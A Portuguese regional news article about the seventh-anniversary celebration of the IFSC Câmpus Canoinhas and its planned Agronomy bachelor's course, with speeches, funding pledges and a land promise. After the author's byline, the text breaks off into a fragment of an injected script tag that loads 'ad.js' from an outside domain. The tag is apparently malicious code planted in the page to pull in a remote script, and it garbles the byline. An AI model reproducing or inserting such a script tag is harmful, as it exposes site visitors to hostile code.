InícioDestaqueCâmpus Canoinhas do IFSC comemora aniversário e perspectiva de novo curso superior...

Câmpus Canoinhas do IFSC comemora aniversário e perspectiva de novo curso superior de Agronomia

Últimas notícias

Ambientes virtuais de aprendizagem: como a tecnologia está revolucionando a educação

A digitalização e a integração da tecnologia na educação...

Na comemoração do seu sétimo aniversário, o Câmpus Canoinhas do Instituto Federal de Santa Catarina (IFSC) teve tudo o que um aniversariante tem direito: a presença dos amigos, discursos enfáticos de reconhecimento de sua importância, muitos “vivas!”, música, o tradicional “Parabéns pra você”, bolo e presentes. A solenidade festiva aconteceu na noite de quinta-feira (14), em alusão à data de inauguração e entrega do Câmpus à comunidade, realizada no dia 18 de fevereiro de 2011. A celebração tardia teve um bom motivo: o Câmpus estava passando por obras de adequação e pintura e queria estar bonito na festa.

 

 

“Novinho em folha”, o Câmpus Canoinhas recebeu estudantes, egressos, servidores, autoridades, empresários e parceiros para comemorar o passado de inúmeras conquistas obtidas na curta, mas intensa, história do IFSC no Planalto Norte catarinense e, principalmente, os planos de um futuro ainda melhor. “Nossa história está só começando. Temos um compromisso com esta região e precisamos continuar contando com o apoio de todos para fortalecermos ainda mais a nossa atuação aqui”, disse a diretora do Câmpus Canoinhas, Maria Bertília Oss Giacomelli.

 

 

Participaram da mesa de honra o deputado federal Pedro Uczai; deputado estadual Antônio Mauro Rodrigues de Aguiar; prefeito de Canoinhas, Gilberto dos Passos; vice-prefeito Renato Jardel Gurtinski; assessora de Comunicação da Agência de Desenvolvimento Regional (ADR), em Mafra, Carla Fatima Brey Lachmann; e o presidente da Câmara de Vereadores de Canoinhas, Mário Renato Erzinger.

 

 

Depois de fazer uma apresentação da linha do tempo e de conquistas do IFSC em Canoinhas, a diretora Maria Bertília anunciou o primeiro presente para a comunidade escolar: a aprovação, no Colegiado de Ensino, Pesquisa e Extensão (Cepe), na reunião desta quarta-feira (13), do curso de bacharelado em Agronomia, para início já no ano que vem. O curso só precisa da aprovação do Conselho Superior (Consup) para homologação da oferta no Câmpus Canoinhas.

 

 

A apresentação do projeto de Agronomia foi realizada pelo professor Jefferson Schcik, que vai coordenar o curso. “Cursos nesta área são uma necessidade da região, que tem 14.245 propriedades agropecuárias e 24% de seu PIB proveniente da agropecuária. Mesmo assim, nosso PIB tem uma baixa representação no estado, com apenas 3%. Neste sentido, o IFSC tem uma responsabilidade grande de contribuir para fortalecer a vocação agropecuária do Planalto Norte, com a diversificação de culturas e incremento de valor agregado à produção”, explicou.

 

 

Autor de uma emenda parlamentar no orçamento deste ano, no valor de R$ 250 mil, para a construção do Bloco Agrícola, o deputado federal Pedro Uczai garantiu mais um presente ao Câmpus Canoinhas, durante seu discurso na noite desta quinta: a destinação de mais uma verba de R$ 100 mil para a obra. Conforme Maria Bertília, os recursos são importantes para complementar o aporte financeiro para a construção já garantido pela reitora do IFSC, Maria Clara Kaschny Schneider.

 

 

Os outros dois presentes recebidos pelo Câmpus Canoinhas vieram do prefeito Gilberto dos Passos, que se comprometeu em destinar mais uma área ao IFSC para ampliação do Câmpus e, enquanto presidente da Amplanorte, assumiu o compromisso de que a Associação vai continuar apoiando e fortalecendo o IFSC. As ofertas atendem às necessidades do Câmpus, que vai precisar de um terreno maior para implantação da área experimental do curso de Agronomia e do apoio das prefeituras para efetivação de parcerias que garantam o funcionamento do curso.

Por Liane Dani | Jornalista do IFSC… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.